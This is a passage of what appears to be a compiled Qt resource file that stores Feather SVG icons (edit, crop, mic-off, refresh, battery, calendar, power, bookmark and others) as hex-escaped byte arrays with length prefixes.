\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x65\x64\x69\x74\x2d\
\x33\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x32\x20\
\x32\x30\x68\x39\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\
\x74\x68\x20\x64\x3d\x22\x4d\x31\x36\x2e\x35\x20\x33\x2e\x35\x61\
\x32\x2e\x31\x32\x31\x20\x32\x2e\x31\x32\x31\x20\x30\x20\x30\x20\
\x31\x20\x33\x20\x33\x4c\x37\x20\x31\x39\x6c\x2d\x34\x20\x31\x20\
\x31\x2d\x34\x4c\x31\x36\x2e\x35\x20\x33\x2e\x35\x7a\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x36\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x72\x6f\x70\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x36\x2e\x31\x33\x20\
\x31\x4c\x36\x20\x31\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\
\x20\x32\x20\x32\x68\x31\x35\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x20\x36\x2e\x31\x33\
\x4c\x31\x36\x20\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\
\x32\x20\x32\x76\x31\x35\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xee\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x69\x63\x2d\x6f\
\x66\x66\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x22\
\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\x22\x32\x33\x22\x20\
\x79\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x39\x20\x39\x76\x33\x61\x33\
\x20\x33\x20\x30\x20\x30\x20\x30\x20\x35\x2e\x31\x32\x20\x32\x2e\
\x31\x32\x4d\x31\x35\x20\x39\x2e\x33\x34\x56\x34\x61\x33\x20\x33\
\x20\x30\x20\x30\x20\x30\x2d\x35\x2e\x39\x34\x2d\x2e\x36\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x31\x37\x20\x31\x36\x2e\x39\x35\x41\x37\x20\x37\x20\x30\x20\
\x30\x20\x31\x20\x35\x20\x31\x32\x76\x2d\x32\x6d\x31\x34\x20\x30\
\x76\x32\x61\x37\x20\x37\x20\x30\x20\x30\x20\x31\x2d\x2e\x31\x31\
\x20\x31\x2e\x32\x33\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\
\x31\x39\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\
\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x32\x33\x22\x20\
\x78\x32\x3d\x22\x31\x36\x22\x20\x79\x32\x3d\x22\x32\x33\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x90\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x72\x65\x66\x72\x65\
\x73\x68\x2d\x63\x77\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x33\x20\x34\x20\x32\x33\
\x20\x31\x30\x20\x31\x37\x20\x31\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x20\x32\x30\x20\x31\x20\x31\
\x34\x20\x37\x20\x31\x34\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x33\x2e\x35\
\x31\x20\x39\x61\x39\x20\x39\x20\x30\x20\x30\x20\x31\x20\x31\x34\
\x2e\x38\x35\x2d\x33\x2e\x33\x36\x4c\x32\x33\x20\x31\x30\x4d\x31\
\x20\x31\x34\x6c\x34\x2e\x36\x34\x20\x34\x2e\x33\x36\x41\x39\x20\
\x39\x20\x30\x20\x30\x20\x30\x20\x32\x30\x2e\x34\x39\x20\x31\x35\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x46\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x61\x74\x74\x65\
\x72\x79\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x31\x22\x20\
\x79\x3d\x22\x36\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\x22\
\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x32\x22\x20\x72\x78\x3d\
\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\
\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x33\x22\x20\
\x79\x31\x3d\x22\x31\x33\x22\x20\x78\x32\x3d\x22\x32\x33\x22\x20\
\x79\x32\x3d\x22\x31\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x27\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x69\x73\x63\x22\
\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\
\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\x65\
\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\
\x20\x72\x3d\x22\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x46\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x6c\x75\x6d\
\x6e\x73\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x32\
\x20\x33\x68\x37\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\
\x20\x32\x76\x31\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\
\x32\x20\x32\x68\x2d\x37\x6d\x30\x2d\x31\x38\x48\x35\x61\x32\x20\
\x32\x20\x30\x20\x30\x20\x30\x2d\x32\x20\x32\x76\x31\x34\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\x32\x68\x37\x6d\x30\
\x2d\x31\x38\x76\x31\x38\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x84\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x65\x78\x74\x65\x72\
\x6e\x61\x6c\x2d\x6c\x69\x6e\x6b\x22\x3e\x3c\x70\x61\x74\x68\x20\
\x64\x3d\x22\x4d\x31\x38\x20\x31\x33\x76\x36\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x31\x2d\x32\x20\x32\x48\x35\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\x56\x38\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x31\x20\x32\x2d\x32\x68\x36\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x35\x20\x33\x20\x32\x31\x20\x33\x20\
\x32\x31\x20\x39\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x30\x22\x20\x79\
\x31\x3d\x22\x31\x34\x22\x20\x78\x32\x3d\x22\x32\x31\x22\x20\x79\
\x32\x3d\x22\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x72\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x76\x6f\x6c\x75\x6d\
\x65\x2d\x78\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x31\x20\x35\x20\x36\x20\x39\x20\x32\
\x20\x39\x20\x32\x20\x31\x35\x20\x36\x20\x31\x35\x20\x31\x31\x20\
\x31\x39\x20\x31\x31\x20\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\
\x6f\x6e\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x33\x22\
\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x31\x37\x22\x20\
\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x37\x22\x20\x79\x31\x3d\
\x22\x39\x22\x20\x78\x32\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\x22\
\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x2f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x61\x63\x65\x62\
\x6f\x6f\x6b\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\
\x38\x20\x32\x68\x2d\x33\x61\x35\x20\x35\x20\x30\x20\x30\x20\x30\
\x2d\x35\x20\x35\x76\x33\x48\x37\x76\x34\x68\x33\x76\x38\x68\x34\
\x76\x2d\x38\x68\x33\x6c\x31\x2d\x34\x68\x2d\x34\x56\x37\x61\x31\
\x20\x31\x20\x30\x20\x30\x20\x31\x20\x31\x2d\x31\x68\x33\x7a\x22\
\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x9a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x61\x6c\x65\x6e\
\x64\x61\x72\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\
\x20\x79\x3d\x22\x34\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x38\x22\x20\x72\x78\
\x3d\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\
\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\x22\
\x20\x79\x31\x3d\x22\x32\x22\x20\x78\x32\x3d\x22\x31\x36\x22\x20\
\x79\x32\x3d\x22\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x32\
\x22\x20\x78\x32\x3d\x22\x38\x22\x20\x79\x32\x3d\x22\x36\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x33\x22\x20\x79\x31\x3d\x22\x31\x30\x22\x20\x78\x32\x3d\x22\
\x32\x31\x22\x20\x79\x32\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x34\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x6f\x77\x65\x72\
\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\x2e\x33\
\x36\x20\x36\x2e\x36\x34\x61\x39\x20\x39\x20\x30\x20\x31\x20\x31\
\x2d\x31\x32\x2e\x37\x33\x20\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\
\x31\x3d\x22\x32\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\
\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x1f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x6f\x6f\x6b\x6d\
\x61\x72\x6b\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\
\x39\x20\x32\x31\x6c\x2d\x37\x2d\x35\x2d\x37\x20\x35\x56\x35\x61\
\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\x32\x68\x31\x30\
\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x32\x7a\x22\
\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x6e\
\x3c\
